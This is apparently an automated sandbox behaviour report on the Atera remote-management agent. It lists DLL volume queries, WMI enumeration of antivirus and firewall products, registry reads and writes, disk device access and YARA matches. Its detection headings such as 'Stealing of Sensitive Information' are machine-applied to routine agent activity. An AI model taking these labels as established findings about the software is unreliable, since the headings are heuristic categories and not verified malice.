                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Services.Client\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Services.Client.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI5085.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI5085.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI5885.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI5885.tmp-\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Microsoft.ApplicationInsights.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Diagnostics.DiagnosticSource.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ValueTuple\v4.0_4.0.0.0__cc7b13ffcd2ddd51\System.ValueTuple.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3ECC04 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,35_2_00007FFDEE3ECC04
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E85D4 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,_malloc_crt,_invoke_watson,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,35_2_00007FFDEE3E85D4
                                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiVirusProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiSpywareProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from FirewallProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                                Stealing of Sensitive Information

                                barindex
                                Queries disk data (e.g. SMART data)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeDevice IO: \Device\Harddisk0\DR0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeDevice IO: \Device\Harddisk0\DR0

                                Remote Access Functionality

                                barindex
                                Yara detected AteraAgent
                                Source: Yara matchFile source: 44.0.AgentPackageTicketing.exe.214714d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.AgentPackageAgentInformation.exe.15e7d2e0000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 47.0.AgentPackageInternalPoller.exe.22b81dc0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 49.2.AgentPackageProgramManagement.exe.153fd170000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.0.AgentPackageAgentInformation.exe.2156b880000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 57.0.AgentPackageSystemTools.exe.25fbf120000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.AteraAgent.exe.1779dac0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.2.AgentPackageMonitoring.exe.1f71cd60000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.0.AgentPackageUpgradeAgent.exe.22039cd0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 33.0.AgentPackageSTRemote.exe.2ef73bc0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 26.2.AteraAgent.exe.21630a3e188.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 26.2.AteraAgent.exe.216307ca9d0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 57.2.AgentPackageSystemTools.exe.25fbfa20000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 49.0.AgentPackageProgramManagement.exe.153fcb70000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.0.AgentPackageMonitoring.exe.1f71c980000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 26.2.AteraAgent.exe.216307e4c90.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000002A.00000002.2783908899.000002203A1E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2294249455.0000021C41ED0000.00000004.00000020.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2900108892.00000216491EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.000001538094B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.2086789811.000001F71CC8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2773209313.0000022039FDF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2967276692.00000153FCD97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2788069108.000002203A9F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2319840745.00000281BD900000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.0000021630C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.1982795635.0000015E7D008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2544967022.0000025FD83A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2320145221.00000281BD95C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.000001538097D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2355746152.0000021C5AFE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.000001538066A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C42A76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2434389216.0000022B821F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2327349674.00000281BE452000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2971911829.00000153FCFA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2788069108.000002203A88F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2454916097.0000022B9AF04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.0000015380680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002C.00000000.2361394254.00000214714D2000.00000002.00000001.01000000.00000028.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2246580986.0000021E95E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.000001538095A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2437952320.0000022B827F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.1982795635.0000015E7D085000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2364577218.0000021C5B491000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.0000021630946000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.2086225642.000001F71CBE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2452632944.0000018457840000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.0000021630D05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.00000153809CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2530880306.0000025FBF520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2678972153.000002EF73D7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2420250702.0000022B82032000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000000.2383010410.00000153FCB72000.00000002.00000001.01000000.0000002B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1754093593.000001779DE80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2573114268.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.00000153805B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2941928264.00007FFDF08E9000.00000004.00000001.01000000.0000001E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2679569967.0000029E21543000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.1982795635.0000015E7D000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.00000216309BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2380233543.00000281D6940000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2861314309.0000022052F2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2624626748.000002EF00111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.1999548038.0000024740947000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2392527211.0000021C5B928000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1981577832.0000021500047000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002C.00000002.3063046700.0000021400001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2000509919.0000024740A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.1981546902.0000015E00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2513781301.0000025FBF362000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2513781301.0000025FBF320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2296889526.0000021C42290000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.0000015380985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.2167638496.00007FFDEE579000.00000004.00000001.01000000.0000001E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000027.00000002.2245155748.0000014BCFED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.0000021630DD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.000001538047E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.2090670816.000001F71D9F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C427D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2788069108.000002203A8E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2790839667.0000029E3B6D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002C.00000002.3063046700.0000021400062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000003.2164597390.0000021E96060000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2967276692.00000153FCD4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2320145221.00000281BD92E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.0000021630D43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2695077269.0000029E21F52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.1999548038.0000024740890000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2624626748.000002EF00103000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.00000153802B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.0000021630B22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2454916097.0000022B9AE50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C42B9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2771051408.0000022039EF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.00000153806B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2327349674.00000281BE1D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000003.2711792787.00000269218B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000003.2713795666.0000026922065000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2437952320.0000022B828B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2773209313.0000022039F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C42E23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1762296888.00000177B80E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2773209313.0000022039F32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2437952320.0000022B8269E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2327349674.00000281BE421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.1981546902.0000015E00079000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.0000021630D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000000.2379668284.0000022B81DC2000.00000002.00000001.01000000.0000002A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2905094619.000002164929A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.1982795635.0000015E7D03C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.2057309796.0000022F4BF90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2292749286.000000AF46BD5000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
